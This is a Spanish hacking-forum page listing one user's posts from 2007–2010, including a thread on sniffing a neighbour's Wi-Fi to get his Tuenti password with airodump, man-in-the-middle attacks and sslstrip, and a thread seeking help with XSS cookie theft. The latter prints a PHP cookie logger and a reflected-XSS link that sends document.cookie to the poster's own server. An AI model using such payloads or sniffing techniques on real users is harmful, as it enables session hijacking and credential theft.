Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - magarcan

#11
Hacking / Re: [Práctica] Ataque a ciegas.
3 Junio 2010, 10:15 AM
Cita de: plof en  3 Junio 2010, 07:00 AM
Selecciona las redes que tengan algún cliente asociado con un dispositivo móvil, recuerda que las 6 primeras cifras de la mac dependen del fabricante:
http://standards.ieee.org/regauth/oui/oui.txt
Qué grande, no había caído en eso...

Cita de: plof en  3 Junio 2010, 07:00 AM
Si la conexión del tuenti-movil no va cifrada siempre puedes capturar el tráfico con tu tarjeta de red en modo monitor para descifrar y filtrar lo que te interese sin conectarte al AP. Si no es así pues te conectas y en red local ya haces un poco de ruido... creo que el sslstrip se lleva muy bien con el tuenti.
He intentado hacer eso, capturar tráfico de un AP sin conectarme y no sé por qué pero pese a conseguir gran cantidad de datos hay muy poco útil (por ejemplo alguien que ha subido 50 fotos a Tuenti sólo he conseguido pillar 1, ó de toda una conversación del Tuenti-chat sólo pillar una frase) no sé muy bien por qué será...

sslstrip se llava bien con todos, Tuenti, Facebook...  >:D
#12
Hacking / Re: [Práctica] Ataque a ciegas.
2 Junio 2010, 00:25 AM
Cita de: peibol0.1 en  2 Junio 2010, 00:19 AM
para ver los equipos de la red (ya que tienes permiso para usarla) es simplemente usar el protocolo arp y sus comandos (para ver los equipos ip / mac usa  arp -a ) miras los equipos, si hay varios pudes intentar realizar algun ataque fingerprinting con xprobe2 nmap o el que sea una vez sepas cual es pues no es mas que realizar un ataque main in the midle para obtener la informacion


espero que te ayude
El problema sigue siendo el mismo, conocer el ESSID para atacarlo e introducirme en la red.

PD: por culpa de mi PFC conozco el protocolo ARP mejor que a mi novia  ;D
#13
Hacking / Re: [Práctica] Ataque a ciegas.
2 Junio 2010, 00:11 AM
En cuanto sepa que red utiliza lo tendré pillado por los huevos orejas, el problema es conocerla. Al ir en texto plano un Mitm y listo. Si fuese cifrado, tampoco supondría mucho problema.

Si consigo pillar su IP, podría averiguar el ISP y descartar alguna red, pero...

A ver si a alguien más se le ocurre alguna otra manera. Siempre está la opción de desvalijar todas las redes y escuchar de todos los clientes hasta que de con él, pero no me parece ni elegante ni ético.

Saludos!!
#14
Hacking / [Práctica] Ataque a ciegas.
1 Junio 2010, 20:34 PM
Lo primero es pedir perdón por lo abstracto del título, pero es que no sabía muy bien qué poner...

PLANTEAMIENTO
El otro día estaba con un amigo (y vecino) y vi que siempre se conecta a Tuenti utilizando la versión tuenti-móvil. Le dije que tuviera cuidado que no era segura (la clave se manda en texto plano, en lugar de en SSL como para con su hermano mayor). El caso es que se rió de mi y me retó a conseguir su contraseña.

Ambos somos vecinos y me confirmó que en mi casa llega la señal de su red wifi, el problema es que también llegan otras 20 redes y no sé cuál es la suya. Obtener la contraseña no es ningún problema práctico (ya lo he hecho con otras redes con fines educativos) ni moral (se lo pregunté y me dió permiso).

El problema es que no sé por dónde empezar...

INTENTOS
Puedo ver, más o menos, cuándo está conectado mirando su estado de Tuenti, por lo que me he puesto a mirar los clientes conectados a las distintas redes que llegan a mi casa con airodump, pero no estoy seguro de cuál es él.

Lo que se me ocurrió fue hablar con él utilizando el chat del tuenti para ver si podía obtener su IP. Simplemente me puse a hablar con él y a capturar con Wireshark, pero la IP (y la MAC) de orgen corresponden a un servidor de Tuenti (lo comprobé con Whois).

¿Alguien puede indicarme por dónde meterle mano al asunto?

Un saludo!!
#15
Hacking Mobile / Comandos AT
6 Marzo 2008, 14:29 PM
Tengo un Siemens S35i, que soporta comandos AT. Me he bajado el manual y he intentado comunicarme utilizando el hyperterminal de windows.

El resultado es que escribo en la terminal (con el eco activado), pero no obtengo ningún tipo de respuesta. ¿Cuál puede ser la causa?

La configuración que uso en la hyperterminal es todo por defecto, salvo la velocidad que he puesto 9600 (he probado también con 2400) y lo del eco.
#16
Hacking Mobile / Re: mobileunix
11 Diciembre 2007, 15:38 PM
Pero ¿es un entorno o un emulador? Hace poco vi una versión de MsDos en java, pero era emulado y se ejecutaba sobre una sandbox, de modo que sólo simulaba el S.O. y no podías realizar ninguna operación real con él.
#17
Nivel Web / Re: Ayuda con XSS
28 Noviembre 2007, 19:39 PM
Definitivamente la vulnerabilidad ha sido corregida (es que la descubrí hace tiempo cuando empecé a estudiar los XSS).
Me toca descubrir otra vulnerabilidad para hacer pruebas y ver si con mi código me guarda las cookies.

PD: en la entrada XSS de la wikipedia hay otro código para guardar las cookies más currado que el mío, a lo mejor lo adopto.
PD2: si me recomendáis algún link sobre XSS nunca está de más.

---GRACIAS---
#18
Nivel Web / Re: Ayuda con XSS
28 Noviembre 2007, 15:26 PM
Ok, el caso es que no me crea el archivo, por lo que pienso que la url vulnerable que utilizo ha sido arreglada. Ahora me toca buscar nuevas.  :-\
A ver si tengo suerte.
#19
Nivel Web / Re: Ayuda con XSS
28 Noviembre 2007, 14:54 PM
Gracias por las respuestas.
Cita de: EvilGobliny estas seguro que esa persona esta logueada?
Sí, porque estoy haciendo las pruebas con una cuenta de mail que me he creado para hacer las pruebas.

Cita de: EvilGobliny creo que en el txt te falta el $_GET para capturar la Cookie desde el link
¿En que parte del código?

Cita de: Ing_AmcDale
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie+'blabla'</script>
Ahora mismo lo pruebo. Por cierto, ¿qué hace eso que has añadido?
#20
Nivel Web / Ayuda con XSS
28 Noviembre 2007, 12:56 PM
He estado leyendo en el foro sobre XSS (indirecta) y me he puesto a hacer mis pruebas. Durante éstas estoy intentando capturar cookies.
Para ello:
-He creado un script en php y lo he colocado en mi server que crea un TXT y guarda la información de la cookie.
-Mando un email con un hipervínculo a la url vulnerable+script.
El problema es que no recibo nada no sé si falla el código del script de mi server, el que coloco en el hipervínculo o que la url ha dejado de ser vulnerable. ¿Mepodéis echar una mano? GRACIAS

Adjuntos:
Mi script PHP
<?
$fp = fopen("captura.txt","a");
fputs($fp, $cookie);
fclose($fp);
echo "<script>window.location=http://www.google.com</script>";
?>


Lo que pongo en el hipervínculo:
http://www.servidorvulnerable.../.../...=<script>window.location='http://miserver.com/script.php?cookie='+document.cookie</script>